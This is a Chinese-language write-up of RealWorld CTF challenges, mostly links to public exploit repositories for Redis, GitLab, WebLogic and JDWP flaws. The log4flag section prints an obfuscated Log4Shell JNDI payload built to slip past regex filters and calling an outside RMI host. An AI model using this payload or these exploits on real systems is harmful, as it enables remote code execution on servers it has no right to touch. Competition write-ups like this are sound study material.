标签：Hacker Database Writeup blog RealWorld CTF https com Refer

文章目录

• Digital Souvenir
• log4flag
• Be-a-Database-Hacker
• the Secrets of Memory
• baby flaglab
• Flag Console
• Be-a-Database-Hacker 2
• Java Remote Debugger

---

Digital Souvenir

rwctf{RealWorldIsAwesome}

log4flag

有一些正则过滤

网上bypass方法很多，随便找一个就行

${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}

Refer：https://cloud.tencent.com/developer/article/1921530

Be-a-Database-Hacker

redis未授权访问

Refer: https://github.com/n0b0dyCN/redis-rogue-server

the Secrets of Memory

Refer：https://landgrey.me/blog/16/

baby flaglab

Refer：https://github.com/Al1ex/CVE-2021-22205

Flag Console

Refer：https://github.com/backlion/CVE-2020-14882_ALL

Be-a-Database-Hacker 2

Refer：https://blog.csdn.net/qq_36869808/article/details/122426922

Java Remote Debugger

Test.java

import java.lang.Thread;
public class Test {
  public static void main (String[] args) throws Exception{
    int i = 0;
    while (1 == 1) {
      Thread.sleep(1000);
      System.out.println("" + i);
      i += 1;
    }
  }
}

Java Debug Wire Protocol (JDWP) - Remote Code Execution

Refer：https://security.tencent.com/index.php/blog/msg/137

标签：Hacker,Database,Writeup,blog,RealWorld,CTF,https,com,Refer
来源： https://blog.csdn.net/mochu7777777/article/details/122645259

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。